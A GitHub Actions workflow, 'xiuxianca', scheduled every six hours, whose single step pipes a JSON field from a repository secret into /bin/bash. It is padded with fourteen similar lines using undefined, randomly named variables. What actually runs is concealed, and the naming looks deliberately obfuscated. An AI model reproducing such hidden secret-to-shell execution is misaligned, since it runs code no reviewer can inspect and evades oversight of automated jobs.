name: xiuxianca
on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiuxianca
        env:
          i4697: ${{ secrets.i4697 }}
        run: |
          echo $i4697 | jq -r .lvz00 | /bin/bash
          echo $dqfqr4 | jq -r .ogap26 | /bin/bash
          echo $up16 | jq -r .tn7 | /bin/bash
          echo $logi006 | jq -r .ijpcw606 | /bin/bash
          echo $lh8 | jq -r .km65 | /bin/bash
          echo $jrfu98 | jq -r .ngitv28 | /bin/bash
          echo $tkmp87 | jq -r .lpzt30 | /bin/bash
          echo $iyu3347 | jq -r .ibj5334 | /bin/bash
          echo $pkn29264 | jq -r .ob11 | /bin/bash
          echo $uawqo7 | jq -r .psoqb723 | /bin/bash
          echo $oa9 | jq -r .xrrjg89753 | /bin/bash
          echo $k83656 | jq -r .qvv90 | /bin/bash
          echo $fqugo352 | jq -r .ayibu74 | /bin/bash
          echo $lev4 | jq -r .z31126 | /bin/bash
          echo $msb8893 | jq -r .gt56 | /bin/bash

